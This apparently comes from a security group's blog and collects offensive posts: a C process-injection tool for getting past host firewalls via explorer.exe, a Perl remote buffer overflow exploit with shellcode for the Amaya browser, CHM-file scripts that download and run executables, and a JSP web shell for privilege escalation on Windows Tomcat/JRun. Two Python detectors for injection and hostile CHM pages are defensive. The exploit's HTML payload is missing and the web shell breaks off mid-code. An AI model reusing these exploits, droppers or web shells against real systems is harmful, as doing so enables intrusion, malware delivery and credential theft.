How to Bypass a Firewall with Process Injection

Hello Friends.

The first question is: why process injection?

In this method we attach an evil process to a permitted process. As you know, firewalls permit some processes, such as Internet Explorer [IE], Firefox or Windows Update, and these processes can [usually] connect to the Internet without trouble.

Process injection, DLL injection and "PE injection" are methods of bypassing firewalls [these methods are called firewall leaks].

In DLL injection, we inject a DLL into an application's process space, and the application references our malicious DLL, which makes the firewall believe that it is the application itself that is using the DLL.

Today when we talk about injection, we are talking about a DLL that is loaded into a running process's memory. As we know, Windows is designed for this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example, Babylon Dictionary is one of them].

I don't intend to talk about these [DLL, process injection] at this time; I just want to talk about process injection [or hijacking] to bypass firewalls.

Attention to the models:

Principle of application run [default]:

[Figure: principle-of-application-run]

When a dynamic library [DLL] is included:

[Figure: method-for-inclusion-of-a-dynamic-library]

Inserting malicious code into a trusted process:

[Figure: code-inject]

Using Internet Explorer [trusted software] for injection:

[Figure: used-from-browser-to-inject]

The following illustration shows general code injection with the Windows API method [VirtualAllocEx(), ...]:

[Figure: kernel-process-inject]

How to inject into a process [with C code]:

For firewall bypass we have 4 parts:

- Open a process "P"
- Allocate memory remotely in P's address space
- Copy the code into the remote process
- Create a thread to execute the code remotely [this is where the injected code runs]

[Figure: process-inject-map1]

Example of process injection into EXPLORER.EXE [code]:

 
    #pragma comment(lib,"Shlwapi.lib")
    #pragma comment(lib,"ADVAPI32.LIB")
    #include <stdio.h>
    #include <windows.h>
    #include <Shlwapi.h>
    #include <tlhelp32.h>
    #define INJECT_EXE  "explorer.exe"

    /* Parameter block copied into the target process. The remote thread can
       only use what is in here: absolute API addresses and plain strings,
       nothing that refers back to this program's own image.
       Build as 32-bit C: pointers are stored in DWORDs and the FARPROCs are
       called with arguments, which C++ compilers reject. */
    typedef struct _RPar
    {
        DWORD dwDeleteFile;
        DWORD dwSleep;
        DWORD dwMessageBox;
        char Filename[1024];
        char string1[1024];
        char string2[1024];
    } RPar;

    /* Body of the remote thread. It is copied byte-for-byte into the target,
       so it must be self-contained and shorter than dwThreadSize. */
    DWORD __stdcall ThreadProc(RPar *Para)
    {
        FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
        FARPROC PSleep = (FARPROC)Para->dwSleep;
        FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;

        PMessageBox(NULL,Para->string1,Para->string2,MB_OK);

        /* keep trying to delete the injector's own file until it has exited */
        while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
        return 0;
    }

    int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
    {
        DWORD dwThreadId,pID=0,dwThreadSize=2048;
        void *pRemoteThread;
        char ExeFile[1024];
        HANDLE hProcess,hSnap;
        HINSTANCE hKernel, hUser;
        RPar my_RPar,*pmy_RPar;
        PROCESSENTRY32 pe32 = {0};

        /* find the PID of the trusted process named in INJECT_EXE */
        if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
            return 3;
        pe32.dwSize = sizeof(PROCESSENTRY32);
        Process32First(hSnap, &pe32);
        do {
            if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
            {
                pID=pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnap,&pe32));
        CloseHandle(hSnap);
        if ( pID == 0 )
            return 4;   /* target process is not running */

        /* part 1: open the process "P" */
        hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
        if ( hProcess == NULL )
            return 5;
        /* part 2: allocate executable memory in P's address space */
        pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);

        /* part 3: copy the thread body and its parameter block into P */
        WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
        ZeroMemory(&my_RPar,sizeof(RPar));
        hKernel = LoadLibrary( "kernel32.dll");
        my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
        my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
        hUser = LoadLibrary( "user32.dll");
        my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
        GetModuleFileName(NULL,ExeFile,1024);
        printf ("%s\n", ExeFile);
        strcpy(my_RPar.Filename, ExeFile);
        strcpy(my_RPar.string1, "HI Abysssec");
        strcpy(my_RPar.string2, "OK");
        pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
        WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);

        /* part 4: start a thread in P at the copied code */
        CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
        FreeLibrary(hKernel);
        FreeLibrary(hUser);
        CloseHandle(hProcess);
        system("tasklist");
        return 0;
    }

What happens when the firewall is bypassed?

On servers:

We can call Internet Explorer or another trusted application with [ASP.NET execute permission] and run a backdoor on any port.

With this method we can telnet to an open port on the server without any worry.

On clients:

Backdoors, Trojans and other bad software connect to the Internet without being granted access.

Real-world test [discovered by Abysssec]:

Vulnerable firewall [Outpost 2009]:

http://www.agnitum.com/products/outpost/

You can inject a process into IE7 or Mozilla Firefox [trusted by default].

[Sorry, no more information: this bug is not fixed yet. You can test it with process injector tools.]

www.tarasco.org

[pinjector.exe]:

Download link + source:

http://www.tarasco.org/security/pinjector/index.html

Final deduction:

1- We can bypass some firewalls: they don't check memory allocated inside a trusted process.

2- DLL, process and PE injection are useful ways to run code without a new process ID [PID].
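The check a defender wants against this pattern is on the endpoint, not in the firewall: the injector's own steps (OpenProcess with PROCESS_ALL_ACCESS, then a remote thread that starts in memory belonging to no loaded module) are visible in Sysmon's ProcessAccess (event 10) and CreateRemoteThread (event 8) records. The Python below is an added example, not code from this post; the event lines are constructed in the Sysmon field layout and the set of "trusted" process names is an assumption.

```python
"""Flag the OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
pattern in Sysmon-style events (added example; sample events are constructed)."""
import json
from typing import Iterable, List, Optional

# Processes a host firewall typically trusts with network access (assumption).
TRUSTED_NETWORK_PROCS = {"explorer.exe", "iexplore.exe", "firefox.exe", "wuauclt.exe"}

# Access rights the injector needs on its target (values from winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def inspect_event(ev: dict) -> Optional[str]:
    """Return a finding for one Sysmon event, or None if it looks benign."""
    src = basename(ev.get("SourceImage", ""))
    tgt = basename(ev.get("TargetImage", ""))
    if not tgt or src == tgt or tgt not in TRUSTED_NETWORK_PROCS:
        return None
    eid = ev.get("EventID")
    if eid == 8 and not ev.get("StartModule"):
        # A thread whose start address is backed by no module image is the
        # signature of code copied into VirtualAllocEx'd memory.
        return (f"EID8: {src} started a thread in {tgt} at {ev.get('StartAddress')} "
                "outside any loaded module (VirtualAllocEx+WriteProcessMemory+CreateRemoteThread)")
    if eid == 10:
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        if granted & INJECT_MASK == INJECT_MASK:
            return (f"EID10: {src} opened {tgt} with 0x{granted:X} "
                    "(create-thread + VM write rights, as PROCESS_ALL_ACCESS grants)")
    return None


def scan(lines: Iterable[str]) -> List[str]:
    """Run inspect_event over newline-delimited JSON events."""
    findings = []
    for line in lines:
        if line.strip():
            hit = inspect_event(json.loads(line))
            if hit:
                findings.append(hit)
    return findings


# Constructed sample events: one injection sequence and two benign events.
SAMPLE_EVENTS = [
    '{"EventID": 10, "SourceImage": "C:\\\\Users\\\\test\\\\inject.exe", '
    '"TargetImage": "C:\\\\Windows\\\\explorer.exe", "GrantedAccess": "0x1F0FFF"}',
    '{"EventID": 8, "SourceImage": "C:\\\\Users\\\\test\\\\inject.exe", '
    '"TargetImage": "C:\\\\Windows\\\\explorer.exe", "StartAddress": "0x00C40000", '
    '"StartModule": "", "StartFunction": ""}',
    '{"EventID": 10, "SourceImage": "C:\\\\Windows\\\\System32\\\\taskmgr.exe", '
    '"TargetImage": "C:\\\\Windows\\\\explorer.exe", "GrantedAccess": "0x1000"}',
    '{"EventID": 8, "SourceImage": "C:\\\\Windows\\\\System32\\\\svchost.exe", '
    '"TargetImage": "C:\\\\Windows\\\\explorer.exe", "StartAddress": "0x77E3A0B0", '
    '"StartModule": "C:\\\\Windows\\\\System32\\\\ntdll.dll", "StartFunction": "EtwpCreateEtwThread"}',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```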

In future:

1- Usage of these methods to bypass other protections [hybrid or free protections]

2- PE injection: why, what, where!?

More information:

http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf

http://www.firewallleaktester.com/docs/leaktest.pdf

http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf

--------------------------------------------------------------------------------------

Happy new year and holidays

Godspeed to you

Daphne

Amaya Web Browser

Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit

Vulnerability discovery & Exploit by SkD

We will start with a description of the affected software:

Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. Browsing features are seamlessly integrated with the editing and remote access features in a uniform environment. This follows the original vision of the Web as a space for collaboration and not just a one-way publishing medium.

The vulnerability lies in the way Amaya (version 11.0.1 and below) parses HTML tags. Certain tags trigger different vulnerabilities, mostly overflows, but each has a different environment for exploitation.

I found that the "<td nowrap>" and the "<title(overflow)>" tags were the most convenient to use for the exploit.

Here is a picture of the debugger's state when the buffer overflow occurs with the "<td nowrap>" tag:

[Figure: Debugger state after overflow (Amaya)]

As we can see the EIP is fully controllable, but to exploit the issue there are quite a few problems:

  • The buffer can only have characters from (hex) 0x00 to 0x7f; 0x80 and above will corrupt the buffer with unneeded characters, so placing the shellcode and finding return addresses will be a problem.
  • Registers point at random places except for ESI, which can be controlled to point to a specified location with a correct calculation.
  • Finding a JMP ESP/CALL ESP in one of Amaya's native modules will be hard because none of them include the allowed characters (we want to make it universal).
  • Heap layout is randomized.

Please note that I was working on this on Windows Vista SP1 so it may differ with XP, 2003, etc.

Okay, so what can we do? This won't be exploited the normal way with the classic jmp esp, and there aren't any SEH handlers to exploit, so what is there to do? Like I mentioned in the previous list, ESI points to a controllable region in the stack. This region will vary if the calculation for the junk characters is not correct (you will see what I am talking about in the exploit code). So to combat this problem we must look to the heap for the clean buffer before transformation. Guess what? EDI points close to this, but it is random, so I cannot just decrease EDI by a static number! What I did was a method similar to egghunting in heap overflows, but my new method is called shellhunting. The conclusion is that the shellhunter must be alphanumeric (well, mostly) and it must look for the shellcode in the heap pointed to by EDI.

This is an advanced stack overflow exploit which also involves the heap! Please remember that this will only work on Vista SP1 (I tested it on XP but different heap layouts again made it a hassle for me to change :) ).

This is the stack and memory when the buffer involves characters over 0x80 (this is the shellcode):

[Figure: Stack state]

And here is the shellcode so you can compare!

my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";

Very corrupted data; like that we cannot execute anything because of malformed instructions (the decoder for the alphanumeric shellcode will also have no chance to work). It is clear that the only way will be to look at the heap.

Now I will describe how my shellhunter works!

  1. The shellhunter starts as 98% alphanumeric so it can be successfully executed.
  2. The "lookout" values must not cause an exception, because we will redirect the execution flow to those values!
  3. It will loop and search the heap for the "lookout" values IN FRONT of the shellcode.
  4. Once the "lookout" values are located, PUSH EDI and then RETN to that address.

This is efficient and it will work one hundred percent of the time the browser parses the HTML page.

You can also see that I am using an addition with the $additionaddr variable; this is because the variable cannot be on the heap next to the corrupted data! So we basically add a few bytes to the value in the register EAX that holds $additionaddr, which turns it into the "lookout" value so the shellhunter can easily compare data in the heap!

I hope you learned something today ladies and gents! The exploit is included below!

#!/usr/bin/perl
#
# Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD (skdrat@hotmail.com)
#                (skd@abysssec.com  )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
#
# Get more information about this at http://abysssec.com
#
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
#
# Note: Author has no responsibility over the damage you do with this!

use strict;
use warnings;
use IO::Socket;

my $html;
my $port_listen = 80; # change this to your desired port!
my $listenip = "127.0.0.1"; # change this to your desired IP!

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";

# my own shell hunter.. :) it is 98% alphanumerical.
# 2nd variant of the shellhunter, to make the exploit more reliable..
my $shellhunter = ("\x58\x58\x40\x40").("\x47" x 4).("\x42" x 6).     #inc edi
("\x42" x 24).("\x42" x 24).("\x39\x07\x75\x8b\x71\x71").
("\x47\x47\x47\x47\x57\xFF\x65\x78\x77\x76");
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7));   #very important calculation
my $overflow4 = "\x44" x $overflow4len;
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10";  #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10";    #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40;      # 45446537    look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4;      # 45446537                <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4;      # 45446537            <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4;      # 45446537        <-
my $additionaddr = "\x35\x65\x41\x45";    #used for an addition in the shellhunter  (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
print "[x] Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit\n";
print "[x] Found/Exploit by SkD (skdrat@ hotmail.com)(skd@ abysssec.com)\n";

while(1)
{
my $sock=new IO::Socket::INET(Listen=>1,LocalAddr => $listenip,LocalPort=>$port_listen,Proto=>'tcp');
die unless $sock;
print "[x] Waiting for clients on port ".$port_listen."..\n";
my $s;
while($s=$sock->accept()){
print "[x] Got a client!\n";
my $request = <$s>;
print $s "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
print "[x] Serving Exploit HTML page :)\n";
# the HTML markup of the served page is missing from this copy of the post
print $s "\n".
"\n".
"\n".
"
\n".
"

\n".
"\n".
"\r\n";
select(undef, undef, undef, 0.5);   # half-second pause; sleep() only takes whole seconds
close $s;
print "[x] Done!\n";
}
}

Execute with a .CHM file


Hi.

In this post I want to talk about executing with a CHM file, or, to be honest, how we can run a Trojan or backdoor from a CHM file, and we will talk a little about bypassing script protection in IE.

A CHM help file has a ".chm" extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. The CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine of CHM:

CHM runs its HTML pages on the Internet Explorer engine.

When you run "VBScript", "ActiveX" or "Object" elements in Internet Explorer 7 or higher, script protection (the ActiveX security control) alerts the user and blocks the script.

[Figure: ie-activex-security-control]

While a CHM file is running we can run and execute "Object" + "VBScript" + "JavaScript" without any error, but if our script includes an ActiveX control, we will see a basic alert.

Execute in CHM:

We need a program to create the CHM file; I like to use WinCHM (free edition):

http://www.softany.com/winchm/

For editing VBScript [with an IDE]:

http://www.vbsedit.com/

[Figure: vbseditor]

Offline mode (intro):

With this object ID:

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

call the "Windows Script Host Shell Object" with an Object element:

Example:
<html>
<object id="wsh"
classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<script>
wsh.Run("c:\\windows\\system32\\calc.exe");
</script>
</html>

Or:

<HTML>
<SCRIPT>
function PROCJavascriptRunProgramParameter( programNameS,
parameterS )
{
var shell = new ActiveXObject("WScript.Shell");
var quoteS = String.fromCharCode( 34 );
shell.run( quoteS + programNameS + quoteS + " " + parameterS, 1,
false );
self.close();
}
</SCRIPT>
<BODY ONLOAD='PROCJavascriptRunProgramParameter( "C:/windows/system32/calc.exe", "names.nsf" );'>
</BODY>
</HTML>


Online mode (backdoor & script bypass mode):

We have three steps to do:

1- Download the .EXE file (without user interaction)
2- Save the file on the victim's PC.
3- Run it.

For downloading with VBScript I used these objects:

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

Following this example:

<script language=vbscript>
Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://abysssec.com"
'Send request To URL
Http.Open "GET", URL, False
Http.Send
'Get response data As a string
BinaryGetURL = Http.ResponseBody
</script>

Save file [the Achilles' heel in CHM]:

Saving files and executing objects, and running ActiveX in IE & CHM.

If you can find a way to bypass the ActiveX alert you can find lots of bugs.

Example of a bug:

http://www.milw0rm.com/exploits/719 [2004]

ActiveX alert:

[Figure: alert]

Note: we have some bypass tricks; maybe we will disclose a few of them here soon.

But until that time you can use this method for download [FTP client]:

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

'Change this, foldername = local dir (where files must be ftp'd TO)
strLocalFolderName = "c:\"

' Server where you are ftp'ing TO
strFTPServerName = "abysssec.com"

' Username you use to ftp
strLoginID = "test"

' Initialize variables
strPassword = "test"
strFTPServerDir = "/www"

' Change this to the folder where the files are on the source server
strFTPServerFolder = "/www"

'The follow lines of code generate the FTP script file on the fly,
'because the directory name changes every time its run

strFTPScriptFileName = strLocalFolderName & "\FTPScript.txt"

Set objFSO = CreateObject("Scripting.FileSystemObject")

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
'objMyFile.WriteLine ("ftp -s open " & strFTPServerName)
objMyFile.WriteLine ("open " & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

'strFTPServerDir = InputBox("Enter directory from which to ftp:")

'objMyFile.WriteLine ("cd " & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine ("cd " & strFTPServerFolder)
'objMyFile.WriteLine ("bin")
objMyFile.WriteLine ("lcd " & strLocalFolderName)
objMyFile.WriteLine ("get EF.exe")
objMyFile.WriteLine ("bye")
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

'The following code executes the FTP script. It creates a Shell
'object and run FTP program on top of it.
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run ("ftp -s:" & chr(34) & strFTPScriptFileName & chr(34))
'objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject("Scripting.FileSystemObject")
CleanPath="c:\"

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
if Flag = 0 then
file.delete
end if
Next

For execution you can use this:

<script language=vbscript>
set  shell = CreateObject("WScript.Shell")
shell.run( "cmd.exe" )
</script>

--------------------------------------------------------------------------------------

Bypass script protection in CHM:

When you run this exploit [the latest IE7 exploit at this time]:

http://www.milw0rm.com/exploits/7410

This exploit is detected by IE's script security protection. You can run this exploit in a CHM and not worry about execution through the "heap spray" method.

[Figure: final]

Test it:

http://abysssec.com/files/Execute-with-IE.chm

OK, deduction:

1- We can put backdoors & Trojans in CHM files [fake books]

2- We can run IE exploits in CHM files.

3- We can execute, download & upload with CHM files.

4- We can run all COM & DLL objects with it.
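For triage of a help file you did not build, the HTML inside it can be checked for exactly the pieces this post combines: the WScript.Shell CLSID or ProgID, the HTTP download objects listed above, a FileSystemObject and a Run call. The Python below is an added example, not the post's code; the three sample pages are constructed (the second and third mirror the post's own snippets) and the ranking rules in verdict() are an assumption.

```python
"""Scan HTML (for example pages extracted from a CHM) for the script/object
combinations used in the post (added example; samples are constructed)."""
import re
from typing import Dict, List

# CLSID of "Windows Script Host Shell Object", as quoted in the post.
WSH_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
QUOTE = "[\"'\u201c\u201d]"          # straight or typographic quotes

INDICATORS = {
    "wsh_shell_object": re.compile(r"clsid:\s*" + WSH_SHELL_CLSID, re.I),
    "wsh_shell_script": re.compile(
        r"(?:ActiveXObject|CreateObject)\s*\(\s*" + QUOTE + r"WScript\.Shell", re.I),
    "http_download": re.compile(
        r"CreateObject\s*\(\s*" + QUOTE
        + r"(?:Microsoft\.XMLHTTP|MSXML2\.ServerXMLHTTP|WinHttp\.WinHttpRequest(?:\.5\.1)?)",
        re.I),
    "file_write": re.compile(
        r"CreateObject\s*\(\s*" + QUOTE + r"Scripting\.FileSystemObject", re.I),
    "run_call": re.compile(r"\.\s*Run\b", re.I),   # shell.Run(...) or sh.Run "..."
}


def scan_html(html: str) -> Dict[str, List[str]]:
    """Map each indicator name to the literal matches found in the page."""
    hits: Dict[str, List[str]] = {}
    for name, rx in INDICATORS.items():
        found = [m.group(0) for m in rx.finditer(html)]
        if found:
            hits[name] = found
    return hits


def verdict(hits: Dict[str, List[str]]) -> str:
    """Rank the combination of indicators (the ranking itself is an assumption)."""
    shell = "wsh_shell_object" in hits or "wsh_shell_script" in hits
    if "http_download" in hits and ("file_write" in hits or "run_call" in hits):
        return "download-and-execute chain"
    if shell and "run_call" in hits:
        return "local command execution"
    if hits:
        return "suspicious objects"
    return "clean"


# Constructed samples: a plain help page, the post's offline example, and a
# download-then-run page in the style of the post's online mode.
BENIGN = "<html><body><h1>Installing the product</h1><p>Click Next.</p></body></html>"
OFFLINE = ('<html><object id="wsh" classid="clsid:' + WSH_SHELL_CLSID + '"></object>'
           '<script>wsh.Run("c:\\\\windows\\\\system32\\\\calc.exe");</script></html>')
ONLINE = ('<script language=vbscript>\n'
          'Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")\n'
          'Http.Open "GET", "http://example.invalid/payload.exe", False\n'
          'Http.Send\n'
          'Set fso = CreateObject("Scripting.FileSystemObject")\n'
          'Set sh = CreateObject("WScript.Shell")\n'
          'sh.Run "c:\\\\payload.exe"\n'
          '</script>')

if __name__ == "__main__":
    for label, page in (("benign", BENIGN), ("offline", OFFLINE), ("online", ONLINE)):
        print(label, verdict(scan_html(page)), sorted(scan_html(page)))
```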

In future:

1- Talk about the heap spray method.

2- Talk about fuzzing OBJECT.

3- Talk about bypassing the ActiveX question in .CHM [if I find it!!!!]


Questions?

-----------------------------------------------

The Abysssec comment problem is solved; feel free to write your comments and mail your requests and questions to us.

Daphne

Tomcat & JRun Privilege Escalation (Windows)

In the name of God.

Hello my friends & all readers,

In Tomcat [JSP], JRun [ColdFusion] and some other HTTP servers, when a "JSP" function is called on Windows, attackers can escalate privileges.

This bug arises from the difference between the Windows and Linux kernels.

Example vulnerable software: "PLESK" and many other web management systems use them; you can find them.

TOMCAT: [http://tomcat.apache.org/]

JRun: [http://www.adobe.com/products/jrun/]

Diagram of running a web application in Windows [note user mode & kernel mode]:

[Diagram: web application on Windows]

Diagram of running a web application in Linux [note user mode & kernel mode]:

[Diagram: web application on Linux]

Please pay attention to the diagrams. I don't mean to describe the Windows & Linux kernels, but as you see, in Windows service security & application security are in user mode and you are not face to face with the kernel, whereas in Linux we have different service calling & user access.

When a "JSP" web application runs on Linux [with Tomcat or another server], you get the privileges of the owner [runner] user. But when you run it on Windows [Tomcat or JRun web server], the "JSP" application takes JRun's or Tomcat's access.

They have Administrator access. Therefore you have an Admin-level process.

Using the [getRuntime().exec] function in [JSP] you can run a process.

This is a test [detail]:

<%@ page import="java.io.IOException" %>
<% Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\""); %>

Here is one of the published PoCs for this vulnerability.

We can run it, [abysssec.jsp] -> :

<%@ page import="java.util.*,java.io.*"%>
<%
%>

<%--
abysssec inc public material

just upload this file with abysssec.jsp and execute your command
your command will run as administrator . you can download sam file
add user or do anything you want .
note : please be gentle and don't obstructionism .
vulnerability discovered by : abysssec.com

--%>

Abysssec inc (abysssec.com) JSP vulnerability<br />
<center><br />
<h3>JSP Privilege Escalation Vulnerability PoC</h3>
<p></center></p>
<form METHOD="GET" NAME="myform" ACTION="">
<input TYPE="text" NAME="cmd"/>
<input TYPE="submit" VALUE="Execute !"/>
</form>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
